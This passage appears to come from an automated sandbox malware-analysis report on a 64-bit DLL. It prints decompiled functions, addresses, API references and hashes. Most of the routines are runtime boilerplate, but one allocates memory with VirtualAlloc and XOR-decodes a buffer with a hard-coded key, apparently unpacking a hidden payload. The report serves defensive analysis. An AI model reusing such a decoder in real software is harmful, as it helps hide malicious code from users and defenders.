                                                                                                      				_t32 = E00007FF87FF87C102BD0(_t47, _v32);
                                                                                                      				if (_a24 <= 0) goto 0x7c1019bd;
                                                                                                      				E00007FF87FF87C102C00(_t32, _v40);
                                                                                                      				_v24 = _t47;
                                                                                                      				E00007FF87FF87C102190(_a8);
                                                                                                      				E00007FF87FF87C1011E0(_t47, _v24, _a24);
                                                                                                      				E00007FF87FF87C102150(_t47, _a8);
                                                                                                      				_t49 =  *_t47 + 1;
                                                                                                      				_v16 = _t49;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				E00007FF87FF87C102100(_t49, _v40, _v16); // executed
                                                                                                      				E00007FF87FF87C102150(_t49, _a8);
                                                                                                      				 *_t49 = 0xf;
                                                                                                      				return E00007FF87FF87C1023A0(_t49, _a8, _a24);
                                                                                                      			}










                                                                                                      0x7ff87c101910
                                                                                                      0x7ff87c101915
                                                                                                      0x7ff87c101919
                                                                                                      0x7ff87c101929
                                                                                                      0x7ff87c10192b
                                                                                                      0x7ff87c101935
                                                                                                      0x7ff87c10193e
                                                                                                      0x7ff87c101949
                                                                                                      0x7ff87c10194e
                                                                                                      0x7ff87c101951
                                                                                                      0x7ff87c101963
                                                                                                      0x7ff87c101968
                                                                                                      0x7ff87c101972
                                                                                                      0x7ff87c101982
                                                                                                      0x7ff87c10198d
                                                                                                      0x7ff87c101994
                                                                                                      0x7ff87c101999
                                                                                                      0x7ff87c1019a3
                                                                                                      0x7ff87c1019b8
                                                                                                      0x7ff87c1019c2
                                                                                                      0x7ff87c1019ca
                                                                                                      0x7ff87c1019cd
                                                                                                      0x7ff87c1019d7
                                                                                                      0x7ff87c1019ec
                                                                                                      0x7ff87c1019f6
                                                                                                      0x7ff87c1019fb
                                                                                                      0x7ff87c101a15

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
                                                                                                      • String ID:
                                                                                                      • API String ID: 2899389904-0
                                                                                                      • Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                      • Instruction ID: 01564554e5b28350710ba750008cbc32fb7b7860682d9ad7baf10f4f01583375
                                                                                                      • Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                      • Instruction Fuzzy Hash: CD21BE23A2CA8181DB10EB52E89137EA760FBCABD0F100075FA9D4775ADE7CD5C08B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 79%
                                                                                                      			E00007FF87FF87C1013A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
                                                                                                      				void* _v16;
                                                                                                      				signed long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				signed int _v40;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if (_a16 - 0xffffffff <= 0) goto 0x7c1013cd;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				_v24 = _a16 * _a24;
                                                                                                      				if (_v24 - 0x1000 < 0) goto 0x7c101475;
                                                                                                      				_v40 = _a8;
                                                                                                      				if ((_v40 & 0x0000001f) == 0) goto 0x7c101409;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				_v16 = _v40 - 8;
                                                                                                      				_v32 =  *_v16;
                                                                                                      				if (_v32 - _v40 < 0) goto 0x7c101435;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				if (_v40 - _v32 - 8 >= 0) goto 0x7c101450;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				if (_v40 - _v32 - 0x27 <= 0) goto 0x7c10146b;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				_a8 = _v32;
                                                                                                      				0x7c104184(); // executed
                                                                                                      				return __eax / _a24;
                                                                                                      			}







                                                                                                      0x7ff87c1013a0
                                                                                                      0x7ff87c1013a5
                                                                                                      0x7ff87c1013aa
                                                                                                      0x7ff87c1013c6
                                                                                                      0x7ff87c1013c8
                                                                                                      0x7ff87c1013d8
                                                                                                      0x7ff87c1013e6
                                                                                                      0x7ff87c1013f1
                                                                                                      0x7ff87c101402
                                                                                                      0x7ff87c101404
                                                                                                      0x7ff87c101412
                                                                                                      0x7ff87c10141f
                                                                                                      0x7ff87c10142e
                                                                                                      0x7ff87c101430
                                                                                                      0x7ff87c101449
                                                                                                      0x7ff87c10144b
                                                                                                      0x7ff87c101464
                                                                                                      0x7ff87c101466
                                                                                                      0x7ff87c101470
                                                                                                      0x7ff87c10147a
                                                                                                      0x7ff87c101483

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                      • String ID:
                                                                                                      • API String ID: 3668304517-0
                                                                                                      • Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                      • Instruction ID: 2fbf3b04e7706602a52c2d0bbc610608aec739f25d37051d984eedb1e3b58823
                                                                                                      • Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                      • Instruction Fuzzy Hash: 84212A27628B8481DB20DB59F08021AB3A4F7897E4F100635FAED43BA9EF3CD1C08B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 45%
                                                                                                      			E00007FF87FF87C119510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				signed int _v28;
                                                                                                      				intOrPtr _v32;
                                                                                                      				signed int _v36;
                                                                                                      				intOrPtr _v40;
                                                                                                      				signed int _t35;
                                                                                                      				signed int _t48;
                                                                                                      				long long _t63;
                                                                                                      				intOrPtr _t64;
                                                                                                      				void* _t66;
                                                                                                      				void* _t76;
                                                                                                      				void* _t77;
                                                                                                      
                                                                                                      				_a16 = __edx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v24 = 0;
                                                                                                      				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
                                                                                                      				_v16 = _t63;
                                                                                                      				_v32 = E00007FF87FF87C1091B8(_t63, _t66, L"64", _t76, _t77);
                                                                                                      				_v36 = E00007FF87FF87C1091B8(_t63, _t66, L"4096", _t76, _t77);
                                                                                                      				_t35 = E00007FF87FF87C1091B8(_t63, _t66, L"8192", _t76, _t77);
                                                                                                      				r9d = _v32;
                                                                                                      				r8d = _v36 | _t35;
                                                                                                      				VirtualAlloc(??, ??, ??, ??); // executed
                                                                                                      				_v24 = _t63;
                                                                                                      				if (_v24 != 0) goto 0x7c11958f;
                                                                                                      				goto 0x7c1195f4;
                                                                                                      				_v40 = 0;
                                                                                                      				goto 0x7c1195a3;
                                                                                                      				_v40 = _v40 + 1;
                                                                                                      				if (_v40 - _a16 >= 0) goto 0x7c1195ef;
                                                                                                      				_t64 = _v40;
                                                                                                      				_v28 =  *(_a8 + _t64) & 0x000000ff;
                                                                                                      				asm("cdq");
                                                                                                      				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
                                                                                                      				 *(_v24 + _v40) = _t48;
                                                                                                      				goto 0x7c119599;
                                                                                                      				return _t48;
                                                                                                      			}
















                                                                                                      0x7ff87c119510
                                                                                                      0x7ff87c119514
                                                                                                      0x7ff87c11951d
                                                                                                      0x7ff87c119526
                                                                                                      0x7ff87c11952d
                                                                                                      0x7ff87c11953e
                                                                                                      0x7ff87c11954e
                                                                                                      0x7ff87c119559
                                                                                                      0x7ff87c11956e
                                                                                                      0x7ff87c119571
                                                                                                      0x7ff87c119578
                                                                                                      0x7ff87c11957e
                                                                                                      0x7ff87c119589
                                                                                                      0x7ff87c11958d
                                                                                                      0x7ff87c11958f
                                                                                                      0x7ff87c119597
                                                                                                      0x7ff87c11959f
                                                                                                      0x7ff87c1195ab
                                                                                                      0x7ff87c1195ad
                                                                                                      0x7ff87c1195bb
                                                                                                      0x7ff87c1195c3
                                                                                                      0x7ff87c1195de
                                                                                                      0x7ff87c1195ea
                                                                                                      0x7ff87c1195ed
                                                                                                      0x7ff87c1195f8

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
                                                                                                      • API String ID: 4275171209-3063897839
                                                                                                      • Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                      • Instruction ID: e9a9ad715c057057ade0bf07143933c39a8fcdf75caaabf5d5b4ed7076bdebec
                                                                                                      • Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                      • Instruction Fuzzy Hash: E621E77262C681CBD764CB15E49072AB7A1F789794F40023AF68E83B59DF3CD5808F10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00007FF87FF87C1012B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				signed long long _v32;
                                                                                                      				signed long long _v40;
                                                                                                      				void* _t40;
                                                                                                      				long long _t54;
                                                                                                      				signed long long _t57;
                                                                                                      				signed long long _t58;
                                                                                                      				void* _t60;
                                                                                                      
                                                                                                      				_a24 = r8b;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v40 = 0;
                                                                                                      				if (_a8 != 0) goto 0x7c1012de;
                                                                                                      				goto 0x7c101397;
                                                                                                      				_t42 = __eax % _a16;
                                                                                                      				if (0xffffffff - _a8 >= 0) goto 0x7c1012f8;
                                                                                                      				E00007FF87FF87C104E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
                                                                                                      				_v32 = _a8 * _a16;
                                                                                                      				if ((_a24 & 0x000000ff) == 0) goto 0x7c10137c;
                                                                                                      				if (_v32 - 0x1000 < 0) goto 0x7c10137c;
                                                                                                      				_v24 = _v32 + 0x27;
                                                                                                      				_t54 = _v32;
                                                                                                      				if (_v24 - _t54 > 0) goto 0x7c10133b;
                                                                                                      				E00007FF87FF87C104E7C(_t42, _v24 - _t54, _t54, _t60);
                                                                                                      				E00007FF87FF87C103D6C(_t54, _v24); // executed
                                                                                                      				_v16 = _t54;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				_t57 = _v16 + 0x00000027 & 0xffffffe0;
                                                                                                      				_v40 = _t57;
                                                                                                      				_t58 = _t57 * 0xffffffff;
                                                                                                      				 *((long long*)(_v40 + _t58)) = _v16;
                                                                                                      				goto 0x7c101392;
                                                                                                      				_t40 = E00007FF87FF87C103D6C(_t58, _v32);
                                                                                                      				_v40 = _t58;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				return _t40;
                                                                                                      			}












                                                                                                      0x7ff87c1012b0
                                                                                                      0x7ff87c1012b5
                                                                                                      0x7ff87c1012ba
                                                                                                      0x7ff87c1012c3
                                                                                                      0x7ff87c1012d2
                                                                                                      0x7ff87c1012d9
                                                                                                      0x7ff87c1012e7
                                                                                                      0x7ff87c1012f1
                                                                                                      0x7ff87c1012f3
                                                                                                      0x7ff87c101303
                                                                                                      0x7ff87c10130f
                                                                                                      0x7ff87c10131a
                                                                                                      0x7ff87c101325
                                                                                                      0x7ff87c10132a
                                                                                                      0x7ff87c101334
                                                                                                      0x7ff87c101336
                                                                                                      0x7ff87c101340
                                                                                                      0x7ff87c101345
                                                                                                      0x7ff87c10134c
                                                                                                      0x7ff87c10135a
                                                                                                      0x7ff87c10135e
                                                                                                      0x7ff87c101368
                                                                                                      0x7ff87c101376
                                                                                                      0x7ff87c10137a
                                                                                                      0x7ff87c101381
                                                                                                      0x7ff87c101386
                                                                                                      0x7ff87c10138d
                                                                                                      0x7ff87c10139b

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      • Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                      • Instruction ID: 374831deefdcd30a3488b8f31128646c69add048abd787ef68812ba9ef06b4a6
                                                                                                      • Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                      • Instruction Fuzzy Hash: 9221F72252CB8581DB608B19E08032AB7A4FB897F4F104335E6ED47BE8DF6CD1D08B14
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 58%
                                                                                                      			E00007FF87FF87C102970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                      				signed int _v16;
                                                                                                      				char _v48;
                                                                                                      				long long _v56;
                                                                                                      				signed long long _v64;
                                                                                                      				signed int _v72;
                                                                                                      				void* _t35;
                                                                                                      				void* _t37;
                                                                                                      				signed long long _t39;
                                                                                                      				signed long long _t40;
                                                                                                      				signed long long _t61;
                                                                                                      
                                                                                                      				_t37 = __eflags;
                                                                                                      				_t36 = __edx;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v56 = 0xfffffffe;
                                                                                                      				_t39 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				_t40 = _t39 ^ _t61;
                                                                                                      				_v16 = _t40;
                                                                                                      				_v72 = 0;
                                                                                                      				E00007FF87FF87C101760(__edx,  &_v48);
                                                                                                      				E00007FF87FF87C101490(_t40, _a16);
                                                                                                      				_v64 = _t40;
                                                                                                      				E00007FF87FF87C1011A0(_a24);
                                                                                                      				E00007FF87FF87C102CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
                                                                                                      				E00007FF87FF87C102E90( &_v48, _a16);
                                                                                                      				E00007FF87FF87C102E60( &_v48, _a24);
                                                                                                      				E00007FF87FF87C1016A0(__edx, _v64 + _t40, _a8,  &_v48);
                                                                                                      				_v72 = _v72 | 0x00000001;
                                                                                                      				return E00007FF87FF87C103A70(E00007FF87FF87C101540( &_v48), _t35, _t36, _v16 ^ _t61);
                                                                                                      			}













                                                                                                      0x7ff87c102970
                                                                                                      0x7ff87c102970
                                                                                                      0x7ff87c102970
                                                                                                      0x7ff87c102975
                                                                                                      0x7ff87c10297a
                                                                                                      0x7ff87c102983
                                                                                                      0x7ff87c10298c
                                                                                                      0x7ff87c102993
                                                                                                      0x7ff87c102996
                                                                                                      0x7ff87c10299b
                                                                                                      0x7ff87c1029a8
                                                                                                      0x7ff87c1029b3
                                                                                                      0x7ff87c1029b8
                                                                                                      0x7ff87c1029c5
                                                                                                      0x7ff87c1029dd
                                                                                                      0x7ff87c1029ec
                                                                                                      0x7ff87c1029fe
                                                                                                      0x7ff87c102a0d
                                                                                                      0x7ff87c102a19
                                                                                                      0x7ff87c102a3d

                                                                                                      APIs
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C1029C5
                                                                                                      • type_info::_name_internal_method.LIBCMTD ref: 00007FF87C1029EC
                                                                                                      • type_info::_name_internal_method.LIBCMTD ref: 00007FF87C1029FE
                                                                                                        • Part of subcall function 00007FF87C1016A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1016BC
                                                                                                        • Part of subcall function 00007FF87C101540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C101567
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
                                                                                                      • String ID:
                                                                                                      • API String ID: 652137993-0
                                                                                                      • Opcode ID: ff68c045757dc1b95a1c3926b66d183a1748918898d640881b2e4fd44b880452
                                                                                                      • Instruction ID: a70d387bb895bf3e4037686aade18361540faadf6b5deb954d7c9d46cacdfd10
                                                                                                      • Opcode Fuzzy Hash: ff68c045757dc1b95a1c3926b66d183a1748918898d640881b2e4fd44b880452
                                                                                                      • Instruction Fuzzy Hash: 08113023628A8181DB50DB14E49126BB7A0FBC57D4F901231F6DE87AA9DF3CD1858F50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 45%
                                                                                                      			E00007FF87FF87C101B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                      				signed char _t23;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if ((E00007FF87FF87C102250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x7c101b97;
                                                                                                      				E00007FF87FF87C1018F0(__rax, _a8);
                                                                                                      				E00007FF87FF87C101BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
                                                                                                      				goto 0x7c101be0;
                                                                                                      				r8d = 0;
                                                                                                      				_t23 = E00007FF87FF87C1022B0(_t31, _a8, _a24); // executed
                                                                                                      				if ((_t23 & 0x000000ff) == 0) goto 0x7c101bdb;
                                                                                                      				E00007FF87FF87C1018F0(_t31, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_t31, _a16, _a24);
                                                                                                      				return E00007FF87FF87C1023A0(_t31, _a8, _a24);
                                                                                                      			}




                                                                                                      0x7ff87c101b40
                                                                                                      0x7ff87c101b45
                                                                                                      0x7ff87c101b4a
                                                                                                      0x7ff87c101b67
                                                                                                      0x7ff87c101b6e
                                                                                                      0x7ff87c101b90
                                                                                                      0x7ff87c101b95
                                                                                                      0x7ff87c101b97
                                                                                                      0x7ff87c101ba4
                                                                                                      0x7ff87c101bae
                                                                                                      0x7ff87c101bb5
                                                                                                      0x7ff87c101bc7
                                                                                                      0x7ff87c101be4

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10226B
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10227C
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101B6E
                                                                                                        • Part of subcall function 00007FF87C1018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1018FE
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101BB5
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C101BC7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
                                                                                                      • String ID:
                                                                                                      • API String ID: 872432861-0
                                                                                                      • Opcode ID: 7aa3d2372c1ca0d652da04669d2a978a39a877f23c15b1fa6cc72aa4e53f0d09
                                                                                                      • Instruction ID: 7ef925739d718c094b06b69dd738cffa3bda6df43fb6c86fb088f0d853ac726f
                                                                                                      • Opcode Fuzzy Hash: 7aa3d2372c1ca0d652da04669d2a978a39a877f23c15b1fa6cc72aa4e53f0d09
                                                                                                      • Instruction Fuzzy Hash: 9F11006363CA8181DB40EB56E49156F6360FBC6BC0F106036FE9E47B5ADE2CD4808B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 65%
                                                                                                      			E00007FF87FF87C103F18(void* __ecx) {
                                                                                                      				void* __rbx;
                                                                                                      				void* _t12;
                                                                                                      				void* _t17;
                                                                                                      				void* _t18;
                                                                                                      				void* _t19;
                                                                                                      				void* _t20;
                                                                                                      
                                                                                                      				_t2 =  ==  ? 1 :  *0x7c17f1a0 & 0x000000ff;
                                                                                                      				 *0x7c17f1a0 =  ==  ? 1 :  *0x7c17f1a0 & 0x000000ff;
                                                                                                      				E00007FF87FF87C104760(1, _t12, _t17, _t18, _t19, _t20);
                                                                                                      				if (E00007FF87FF87C106AC0() != 0) goto 0x7c103f47;
                                                                                                      				goto 0x7c103f5b; // executed
                                                                                                      				E00007FF87FF87C10A844(_t17); // executed
                                                                                                      				if (0 != 0) goto 0x7c103f59;
                                                                                                      				E00007FF87FF87C106B1C(0);
                                                                                                      				goto 0x7c103f43;
                                                                                                      				return 1;
                                                                                                      			}









                                                                                                      0x7ff87c103f2c
                                                                                                      0x7ff87c103f2f
                                                                                                      0x7ff87c103f35
                                                                                                      0x7ff87c103f41
                                                                                                      0x7ff87c103f45
                                                                                                      0x7ff87c103f47
                                                                                                      0x7ff87c103f4e
                                                                                                      0x7ff87c103f52
                                                                                                      0x7ff87c103f57
                                                                                                      0x7ff87c103f60

                                                                                                      APIs
                                                                                                      • __isa_available_init.LIBCMT ref: 00007FF87C103F35
                                                                                                      • __vcrt_initialize.LIBVCRUNTIME ref: 00007FF87C103F3A
                                                                                                        • Part of subcall function 00007FF87C106AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FF87C106AC4
                                                                                                        • Part of subcall function 00007FF87C106AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FF87C106AC9
                                                                                                        • Part of subcall function 00007FF87C106AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FF87C106ACE
                                                                                                      • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FF87C103F52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 3388242289-0
                                                                                                      • Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                      • Instruction ID: c827a187916f86208b70d45c229e4569db4dd631b16ebfd865c0f63cab48ca93
                                                                                                      • Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
